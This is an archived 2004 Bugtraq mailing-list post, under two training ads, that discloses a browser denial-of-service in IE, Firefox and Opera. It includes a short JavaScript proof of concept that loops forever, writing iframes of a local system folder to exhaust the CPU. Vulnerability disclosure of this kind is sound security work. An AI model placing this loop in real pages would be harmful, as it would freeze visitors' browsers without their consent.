Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

IE, Firefox, Opera DoS

from [exploits] Network Security [Permanent Link]
Subject: IE, Firefox, Opera DoS
Date: 21 Aug 2004 20:41:46 -0000 


Description
========
 
    Browser DoS through viewing of a malicious page that repeatedly loads 
iframes of C:\Windows\System32 using 100% cpu
    Tested on Mozilla Firefox 0.9.3, Opera 7.54 and IE 6.0 - Opera gives the 
error "The address type is unknown or unsupported" over and over
 
POC
===
URL : http://www.su1d.net/iframe2.html

<scr1pt language="JavaScript">
while(true) 
{
   document.write("<iframe src=\"C:\Windows\system32\"></iframe>");
}
</scr1pt>
Discovered by MeFakon from the su1d exploit development team
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  KDE Security Advisory: Konqueror Cross-Domain Cookie Injection, Waldo Bastian
Next by Date:  Bugs fixed in Version 1.4.3, Joxean Koret
Previous by Thread:  KDE Security Advisory: Konqueror Cross-Domain Cookie Injection, Waldo Bastian
Next by Thread:  Re: IE, Firefox, Opera DoS, Dan Pixley
Indexes:  [Date] [Thread] [Top] [All Lists]